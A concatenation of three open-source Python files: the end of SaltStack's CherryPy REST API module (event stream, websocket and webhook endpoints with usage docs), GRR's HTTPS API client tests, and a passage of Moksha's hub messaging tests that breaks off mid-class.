Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.info(saltEvent.tag)
console.debug(saltEvent.data)
};
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
foo=Foo&bar=Bar!
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in six.iteritems(self.url_map):
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
ssl_test.py
|
#!/usr/bin/env python
"""Tests for API client + HTTPS server integration."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import datetime
import io
import os
import socket
import threading
from absl import app
from cryptography import x509
from cryptography.hazmat import backends
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography.x509 import oid
from http import server as http_server
import portpicker
import requests
import socketserver
from grr_api_client import api as grr_api
from grr_response_core.lib.rdfvalues import crypto as rdf_crypto
from grr_response_server.flows.general import processes
from grr_response_server.gui import api_auth_manager
from grr_response_server.gui import api_call_router_without_checks
from grr_response_server.gui import webauth
from grr_response_server.gui import wsgiapp_testlib
from grr.test_lib import acl_test_lib
from grr.test_lib import fixture_test_lib
from grr.test_lib import test_lib
class ApiSslServerTestBase(test_lib.GRRBaseTest, acl_test_lib.AclTestMixin):
def setUp(self):
super(ApiSslServerTestBase, self).setUp()
key = rdf_crypto.RSAPrivateKey.GenerateKey()
key_path = os.path.join(self.temp_dir, "key.pem")
with open(key_path, "wb") as f:
f.write(key.AsPEM())
subject = issuer = x509.Name([
x509.NameAttribute(oid.NameOID.COMMON_NAME, u"localhost"),
])
cert = x509.CertificateBuilder().subject_name(subject).issuer_name(
issuer).public_key(key.GetPublicKey().GetRawPublicKey()).serial_number(
x509.random_serial_number()).not_valid_before(
datetime.datetime.utcnow()).not_valid_after(
datetime.datetime.utcnow() +
datetime.timedelta(days=1)).add_extension(
x509.SubjectAlternativeName(
[x509.DNSName(u"localhost")]),
critical=False,
).sign(key.GetRawPrivateKey(), hashes.SHA256(),
backends.default_backend())
self.cert_path = os.path.join(self.temp_dir, "certificate.pem")
with open(self.cert_path, "wb") as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
config_overrider = test_lib.ConfigOverrider({
"AdminUI.enable_ssl": True,
"AdminUI.ssl_key_file": key_path,
"AdminUI.ssl_cert_file": self.cert_path,
})
config_overrider.Start()
self.addCleanup(config_overrider.Stop)
self.port = portpicker.pick_unused_port()
thread = wsgiapp_testlib.ServerThread(self.port, name="ApiSslServerTest")
thread.StartAndWaitUntilServing()
self.addCleanup(thread.Stop)
api_auth_manager.InitializeApiAuthManager(
api_call_router_without_checks.ApiCallRouterWithoutChecks)
self.token.username = "api_test_robot_user"
webauth.WEBAUTH_MANAGER.SetUserName(self.token.username)
self.endpoint = "https://localhost:%s" % self.port
class ApiSslE2ETestMixin(object):
def testGetClientWorks(self):
# By testing GetClient we test a simple GET method.
client_id = self.SetupClient(0)
c = self.api.Client(client_id=client_id).Get()
self.assertEqual(c.client_id, client_id)
def testSearchClientWorks(self):
# By testing SearchClients we test an iterator-based API method.
clients = list(self.api.SearchClients(query="."))
self.assertEqual(clients, [])
def testPostMethodWorks(self):
client_id = self.SetupClient(0)
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
client_ref = self.api.Client(client_id=client_id)
result_flow = client_ref.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
self.assertTrue(result_flow.client_id)
def testDownloadingFileWorks(self):
client_id = self.SetupClient(0)
fixture_test_lib.ClientFixture(client_id)
out = io.BytesIO()
self.api.Client(client_id=client_id).File(
"fs/tsk/c/bin/rbash").GetBlob().WriteToStream(out)
self.assertTrue(out.getvalue())
class ApiSslWithoutCABundleTest(ApiSslServerTestBase):
def testConnectionFails(self):
client_id = self.SetupClient(0)
api = grr_api.InitHttp(api_endpoint=self.endpoint)
with self.assertRaises(requests.exceptions.SSLError):
api.Client(client_id=client_id).Get()
class ApiSslWithEnvVarWithoutMergingTest(ApiSslServerTestBase):
def testConnectionFails(self):
client_id = self.SetupClient(0)
api = grr_api.InitHttp(api_endpoint=self.endpoint, trust_env=False)
with self.assertRaises(requests.exceptions.SSLError):
api.Client(client_id=client_id).Get()
class ApiSslWithConfigurationInEnvVarsE2ETest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithConfigurationInEnvVarsE2ETest, self).setUp()
prev_environ = dict(os.environ)
def _CleanUpEnviron():
os.environ.clear()
os.environ.update(prev_environ)
self.addCleanup(_CleanUpEnviron)
os.environ["REQUESTS_CA_BUNDLE"] = self.cert_path
self.api = grr_api.InitHttp(api_endpoint=self.endpoint)
class ApiSslWithWithVerifyFalseE2ETest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithWithVerifyFalseE2ETest, self).setUp()
self.api = grr_api.InitHttp(api_endpoint=self.endpoint, verify=False)
class ApiSslWithWithVerifyPointingToCABundleTest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithWithVerifyPointingToCABundleTest, self).setUp()
self.api = grr_api.InitHttp(
api_endpoint=self.endpoint, verify=self.cert_path)
class Proxy(http_server.SimpleHTTPRequestHandler):
requests = []
def do_CONNECT(self): # pylint: disable=invalid-name
self.__class__.requests.append(self.requestline)
class TCPServerV6(socketserver.TCPServer):
address_family = socket.AF_INET6
class ApiSslProxyTest(ApiSslServerTestBase):
def setUp(self):
super(ApiSslProxyTest, self).setUp()
attempts_count = 0
self.proxy_server = None
while self.proxy_server is None:
try:
self.proxy_port = portpicker.pick_unused_port()
self.proxy_server = TCPServerV6(("::", self.proxy_port), Proxy)
except socket.error:
attempts_count += 1
if attempts_count == 10:
self.fail("Can't initialize proxy server.")
threading.Thread(target=self.proxy_server.serve_forever).start()
self.addCleanup(self.proxy_server.server_close)
self.addCleanup(self.proxy_server.shutdown)
def testProxyConnection(self):
client_id = self.SetupClient(0)
api = grr_api.InitHttp(
api_endpoint=self.endpoint,
proxies={"https": "localhost:%d" % self.proxy_port})
with self.assertRaises(requests.exceptions.ConnectionError):
api.Client(client_id=client_id).Get()
# CONNECT request should point to GRR SSL server.
self.assertEqual(Proxy.requests,
["CONNECT localhost:%d HTTP/1.0" % self.port])
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
test_hub.py
|
# This file is part of Moksha.
# Copyright (C) 2008-2010 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test Moksha's Hub """
import threading
import moksha
try:
import unittest2 as unittest
except ImportError:
import unittest
from time import sleep, time
from uuid import uuid4
from kitchen.iterutils import iterate
import tempfile
import shutil
import os
import stat
import zmq
import json
import moksha.common.testtools.utils as testutils
import moksha.hub.api
from moksha.hub.hub import MokshaHub, CentralMokshaHub
from moksha.hub.reactor import reactor as _reactor
from moksha.hub.monitoring import MonitoringProducer
from nose.tools import (eq_, assert_true, assert_false)
# Some constants used throughout the hub tests
sleep_duration = 0.25
secret = "secret_message"
def simulate_reactor(duration=sleep_duration):
""" Simulate running the reactor for `duration` milliseconds """
global _reactor
start = time()
while time() - start < duration:
_reactor.doPoll(0.0001)
_reactor.runUntilCurrent()
class TestHub:
def _setUp(self):
def kernel(config):
self.hub = MokshaHub(config=config)
self.topic = str(uuid4())
for __setup, name in testutils.make_setup_functions(kernel):
yield __setup, name
def _tearDown(self):
self.hub.close()
@testutils.crosstest
def test_hub_creation(self):
""" Test that we can simply create the hub. """
assert_true(self.hub)
eq_(self.hub.topics, {})
@testutils.crosstest
def test_hub_send_recv(self):
"Test that we can send a message and receive it."
messages_received = []
def callback(json):
messages_received.append(json.body[1:-1])
self.hub.subscribe(topic=self.topic, callback=callback)
sleep(sleep_duration)
self.hub.send_message(topic=self.topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(messages_received, [secret])
@testutils.crosstest
def test_hub_no_subscription(self):
"Test that we don't receive messages we're not subscribed for."
messages_received = []
def callback(json):
messages_received.append(json.body[1:-1])
self.hub.send_message(topic=self.topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(messages_received, [])
class TestConsumer:
def _setUp(self):
def kernel(config):
self.hub = MokshaHub(config=config)
self.a_topic = str(uuid4())
for __setup, name in testutils.make_setup_functions(kernel):
yield __setup, name
def _tearDown(self):
self.hub.close()
def fake_register_consumer(self, cons):
""" Fake register a consumer, not by entry-point like usual.
Normally, consumers are identified by the hub by way of entry-points
Ideally, this test would register the TestConsumer on the
moksha.consumers entry point, and the hub would pick it up.
I'm not sure how to do that, so we're going to fake it and manually
add this consumer to the list of consumers of which the Hub is aware.
"""
consumer = cons(self.hub)
consume = consumer.consume
for topic in iterate(cons.topic):
self.hub.topics[topic] = self.hub.topics.get(topic, [])
if consume not in self.hub.topics[topic]:
print('registering fake topic %r' % topic)
self.hub.topics[topic].append(consume)
sleep(sleep_duration)
return consumer
@testutils.crosstest
def test_abstract(self):
""" Ensure that conumsers with no consume method raise exceptions. """
class StillAbstractConsumer(moksha.hub.api.consumer.Consumer):
pass
try:
c = StillAbstractConsumer(self.hub)
c.consume("foo")
assert(False)
except NotImplementedError as e:
pass
@testutils.crosstest
def test_receive_without_json(self):
""" Try sending/receiving messages without jsonifying. """
messages_received = []
class TestConsumer(moksha.hub.api.consumer.Consumer):
jsonify = False
topic = self.a_topic
def _consume(self, message):
messages_received.append(message)
self.fake_register_consumer(TestConsumer)
# Now, send a generic message to that topic, and see if we get one.
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(len(messages_received), 1)
@testutils.crosstest
def test_receive_str(self):
""" Send a message Consume and verify it. """
messages_received = []
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def _consume(self, message):
messages_received.append(message['body'])
self.fake_register_consumer(TestConsumer)
# Now, send a generic message to that topic, and see if the consumer
# processed it.
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(messages_received, [secret])
@testutils.crosstest
def test_receive_str_double(self):
""" Send a message. Have two consumers consume it. """
messages_received = []
class TestConsumer1(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def _consume(self, message):
messages_received.append(message['body'])
class TestConsumer2(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def _consume(self, message):
messages_received.append(message['body'])
self.fake_register_consumer(TestConsumer1)
self.fake_register_consumer(TestConsumer2)
# Now, send a generic message to that topic, and see if the consumer
# processed it.
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(messages_received, [secret, secret])
@testutils.crosstest
def test_receive_str_near_miss(self):
""" Send a message. Three consumers. Only one receives. """
messages_received = []
class BaseConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def _consume(self, message):
messages_received.append(message['body'])
class Consumer1(BaseConsumer):
pass
class Consumer2(BaseConsumer):
topic = BaseConsumer.topic[:-1]
class Consumer3(BaseConsumer):
topic = BaseConsumer.topic + "X"
self.fake_register_consumer(Consumer1)
self.fake_register_consumer(Consumer2)
self.fake_register_consumer(Consumer3)
# Now, send a generic message to that topic, and see if Consumer1
# processed it but that Consumer2 and Consumer3 didn't
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(messages_received, [secret])
@testutils.crosstest
def test_receive_dict(self):
""" Send a dict with a message. Consume, extract, and verify it. """
obj = {'secret': secret}
messages_received = []
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def _consume(self, message):
obj = message['body']
messages_received.append(obj['secret'])
self.fake_register_consumer(TestConsumer)
# Now, send a generic message to that topic, and see if the consumer
# processed it.
self.hub.send_message(topic=self.a_topic, message=obj)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(messages_received, [secret])
@testutils.crosstest
def test_receive_n_messages(self):
""" Send `n` messages, receive `n` messages. """
n_messages = 10
messages_received = []
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def _consume(self, message):
messages_received.append(message['body'])
self.fake_register_consumer(TestConsumer)
# Now, send n messages and make sure that n messages were consumed.
for i in range(n_messages):
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(len(messages_received), n_messages)
@testutils.crosstest
def test_receive_n_dicts(self):
""" Send `n` dicts, receive `n` dicts. """
n_messages = 10
obj = {'secret': secret}
messages_received = []
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def _consume(self, message):
messages_received.append(message['body'])
self.fake_register_consumer(TestConsumer)
# Now, send n objects and make sure that n objects were consumed.
for i in range(n_messages):
self.hub.send_message(topic=self.a_topic, message=obj)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(len(messages_received), n_messages)
@testutils.crosstest
def test_multiple_topics(self):
""" Send a message to multiple topics. """
n_messages = 2
obj = {'secret': secret}
messages_received = []
b_topic = str(uuid4())
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = [self.a_topic, b_topic]
def _consume(self, message):
messages_received.append(message['body'])
self.fake_register_consumer(TestConsumer)
self.hub.send_message(topic=self.a_topic, message=obj)
self.hub.send_message(topic=b_topic, message=obj)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(len(messages_received), n_messages)
@testutils.crosstest
def test_dynamic_topic(self):
""" Test that a topic can be set at runtime (not import time) """
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = "bad topic"
def __init__(self, *args, **kw):
super(TestConsumer, self).__init__(*args, **kw)
self.topic = "good topic"
def _consume(self, message):
pass
# Just a little fake config.
config = dict(
zmq_enabled=True,
zmq_subscribe_endpoints='',
zmq_published_endpoints='',
)
central = CentralMokshaHub(config, [TestConsumer], [])
# Guarantee that "bad topic" is not in the topics list.
eq_(list(central.topics.keys()), ["good topic"])
@testutils.crosstest
def test_open_and_close(self):
""" Test that a central hub with a consumer can be closed.. ;) """
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = "whatever"
def _consume(self, message):
pass
# Just a little fake config.
config = dict(
zmq_enabled=True,
zmq_subscribe_endpoints='',
zmq_published_endpoints='',
)
central = CentralMokshaHub(config, [TestConsumer], [])
central.close()
@testutils.crosstest
def test_consumer_stats_queued(self):
""" Verify that message processing stats are set for queued messages. """
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def consume(self, message):
pass
cons = self.fake_register_consumer(TestConsumer)
for i in range(5):
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(cons.headcount_in, 5)
eq_(cons.headcount_out, 0)
eq_(cons._exception_count, 0)
eq_(len(cons._times), 0)
@testutils.crosstest
def test_consumer_stats_processed(self):
""" Verify that message processing stats are set for processed messages. """
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def consume(self, message):
pass
self.hub.config['moksha.blocking_mode'] = True
cons = self.fake_register_consumer(TestConsumer)
for i in range(5):
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(cons.headcount_in, 5)
eq_(cons.headcount_out, 5)
eq_(cons._exception_count, 0)
eq_(len(cons._times), 5)
@testutils.crosstest
def test_consumer_stats_exceptions(self):
""" Verify that message processing stats are set for messages that generate exceptions. """
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
